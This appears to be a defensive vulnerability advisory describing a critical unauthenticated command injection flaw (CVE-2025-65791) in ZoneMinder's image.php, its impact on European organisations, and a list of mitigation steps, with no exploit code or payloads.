CVE-2025-65791 is a critical command injection vulnerability identified in ZoneMinder version 1.36.34, a widely used open-source video surveillance software. The vulnerability exists in the web/views/image.php file, where user-supplied input is passed directly to the PHP exec() function without proper sanitization or validation. This flaw corresponds to CWE-78 (Improper Neutralization of Special Elements used in an OS Command). Because the exec() function executes system commands, an attacker can craft malicious input to execute arbitrary commands on the underlying operating system with the privileges of the web server process. The vulnerability requires no authentication and no user interaction, making it remotely exploitable over the network. The CVSS v3.1 score of 9.8 reflects the high impact on confidentiality, integrity, and availability, as attackers can potentially take full control of the affected system, access sensitive video feeds, manipulate or delete recordings, or disrupt surveillance operations. Although no public exploits have been reported yet, the straightforward nature of command injection and the criticality of the software's role in security monitoring elevate the risk. The vulnerability was reserved in November 2025 and published in February 2026, but no official patches or mitigations have been released at the time of this analysis.

For European organizations, the impact of this vulnerability is significant, especially for those relying on ZoneMinder for video surveillance in critical infrastructure, government facilities, transportation hubs, and private enterprises. Successful exploitation can lead to full system compromise, enabling attackers to access or manipulate surveillance footage, disable monitoring capabilities, or use the compromised system as a foothold for lateral movement within the network. This threatens physical security, data privacy, and operational continuity. Given the criticality of surveillance in sectors like public safety, energy, and transportation, disruption or compromise could have cascading effects on national security and public trust. Additionally, unauthorized access to video feeds may violate GDPR and other privacy regulations, exposing organizations to legal and financial penalties. The lack of authentication and user interaction requirements increases the likelihood of automated exploitation attempts, raising the urgency for European entities to address this vulnerability promptly.

1. Immediately restrict network access to the ZoneMinder web interface, especially the vulnerable image.php endpoint, using firewalls or network segmentation to limit exposure to trusted users only. 2. Implement web application firewall (WAF) rules to detect and block suspicious command injection patterns targeting the exec() function. 3. Apply strict input validation and sanitization on all user-supplied data before it reaches any system command execution functions; if possible, disable or replace exec() calls with safer alternatives. 4. Monitor system logs and network traffic for unusual command execution or unexpected behavior indicative of exploitation attempts. 5. If feasible, isolate ZoneMinder servers in dedicated environments with minimal privileges to limit the impact of a potential compromise. 6. Stay alert for official patches or updates from ZoneMinder and apply them immediately once available. 7. Conduct regular security assessments and penetration tests focusing on web application vulnerabilities to detect similar issues proactively. 8. Educate IT and security teams about this vulnerability and ensure incident response plans include scenarios involving video surveillance system compromises.